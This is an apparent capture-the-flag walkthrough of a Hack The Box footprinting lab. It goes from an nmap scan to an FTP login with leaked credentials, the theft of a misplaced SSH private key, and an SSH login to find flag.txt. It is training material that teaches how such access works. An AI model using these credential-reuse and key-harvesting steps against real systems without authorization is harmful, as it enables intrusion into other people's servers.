The Hack The Box (HTB) Footprinting module teaches you how to analyze and footprint a target. Here’s how to derive the solution and capture the flag.
In the first of three Hack The Box footprinting labs, we are given the following instructions.
We were commissioned by the company
Inlanefreight Ltdto test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture.The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.
Additionally, our teammates have found the following credentials “ceil:qwer1234”, and they pointed out that some of the company’s employees were talking about SSH keys on a forum.
The administrators have stored a
flag.txtfile on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.
To begin, do a basic nmap scan to see what we are working with.
nmap 10.129.156.139 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-29 10:02 CDT
Nmap scan report for 10.129.156.139
Host is up (0.068s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.156.139]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.156.139]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.94SVN%I=7%D=6/29%Time=686155AB%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,9D,"220\x20ProFTPD\x20Server\x20\(ftp\.int\.inlanefreight\.
SF:htb\)\x20\[10\.129\.156\.139\]\r\n500\x20Invalid\x20command:\x20try\x20
SF:being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being
SF:\x20more\x20creative\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2121-TCP:V=7.94SVN%I=7%D=6/29%Time=686155AB%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,8E,"220\x20ProFTPD\x20Server\x20\(Ceil's\x20FTP\)\x20\[10
SF:\.129\.156\.139\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more
SF:\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20c
SF:reative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.89 secondsWe see standard FTP and SSH services on their normal ports, as well as the DNS service on port 53. But the service on port 2121 looks interesting.
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.156.139]It is named Ceil’s FTP and appears to be a ProFTPD server. Given the server’s name, we can presume it could be logged into using Ceil’s stolen credentials (given in the lab instructions). Attempt to FTP to the server.
ftp 10.129.156.139 2121
Connected to 10.129.156.139.
220 ProFTPD Server (Ceil's FTP) [10.129.156.139]
Name (10.129.156.139:root): ceil
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.We were able to login with Ceil’s credentials. Look around the directories. ls -al reveals a .ssh directory and in that directory, we find an id_rsa file which appears to be a private key mistakenly placed on the server along with the public key (id_rsa.pub).
ftp> ls
229 Entering Extended Passive Mode (|||44178|)
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> ls -al
229 Entering Extended Passive Mode (|||55963|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
226 Transfer complete
ftp> cd .ssh
250 CWD command successful
ftp> ls -al
229 Entering Extended Passive Mode (|||23401|)
150 Opening ASCII mode data connection for file list
drwx------ 2 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys
-rw------- 1 ceil ceil 3381 Nov 10 2021 id_rsa
-rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub
226 Transfer completeCopy the id_rsa file to the local machine so we can attempt to use it to log into the ssh service we identified in the nmap scan.
ftp> get ids_rsa
local: ids_rsa remote: ids_rsa
229 Entering Extended Passive Mode (|||24783|)
550 ids_rsa: No such file or directory
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||43119|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |***********************************| 3381 484.05 KiB/s 00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (45.45 KiB/s)Next, attempt to login to the server as “ceil”, passing the private key via the -i parm.
ssh -i id_rsa ceil@10.129.156.139
The authenticity of host '10.129.156.139 (10.129.156.139)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.156.139' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
ceil@10.129.156.139: Permission denied (publickey).We are warned that the permissions on our private key are too lax. chmod 600 the key and try again.
chmod 600 id_rsa
┌─[us-academy-3]─[10.10.14.116]─[htb-ac-1915373@htb-aforlth9vq]─[~]
└──╼ [★]$ ssh -i id_rsa ceil@10.129.156.139
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 29 Jun 2025 03:13:56 PM UTC
System load: 0.0 Processes: 160
Usage of /: 86.7% of 3.87GB Users logged in: 0
Memory usage: 12% IPv4 address for ens192: 10.129.156.139
Swap usage: 0%
=> / is using 86.7% of 3.87GB
118 updates can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Nov 10 05:48:02 2021 from 10.10.14.20
ceil@NIXEASY:~$ We are now able to log in to the server using the private key we found earlier. We can now explore the directories.
ls -al
total 36
drwxr-xr-x 4 ceil ceil 4096 Jun 29 15:17 .
drwxr-xr-x 5 root root 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 2008 Jun 29 15:17 .viminfoThere is no flag here nor is it found in any of the subdirectories. Edit the .bash_history to see what the last person did.
ls -al
cd .ssh/
cat id_rsa
ls a-l
ls -al
cat id_rsa.pub >> authorized_keys
cd ..
cd /home
cd ceil/
ls -l
ls -al
mkdir flag
cd flag/
touch flag.txt
vim flag.txt
cat flag.txt
ls -al
mv flag/flag.txt .We see that a flag was created and *moved*. Move up in the directory structure and look there.
ceil@NIXEASY:~$ cd ..
ceil@NIXEASY:/home$ ls -al
total 20
drwxr-xr-x 5 root root 4096 Nov 10 2021 .
drwxr-xr-x 20 root root 4096 Mar 15 2024 ..
drwxr-xr-x 4 ceil ceil 4096 Jun 29 15:18 ceil
drwxr-xr-x 3 cry0l1t3 cry0l1t3 4096 Nov 10 2021 cry0l1t3
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 flagOf course, the flag directory looks interesting. And there is the flag.txt!
ceil@NIXEASY:/home$ cd flag
ceil@NIXEASY:/home/flag$ ls -al
total 36
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 5 root root 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 42 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Feb 25 2020 .bashrc
drwx------ 2 ceil ceil 4096 Dec 15 2020 .cache
-rw-rw-r-- 1 ceil ceil 61 Nov 10 2021 flag.txt
drwxrwxr-x 3 ceil ceil 4096 Dec 15 2020 .local
-rw-r--r-- 1 ceil ceil 807 Feb 25 2020 .profile
-rw-r--r-- 1 ceil ceil 0 Dec 15 2020 .sudo_as_admin_successfulEdit the flag.txt file and copy/paste the flag into the answer.
ceil@NIXEASY:/home/flag$ vi flag.txt
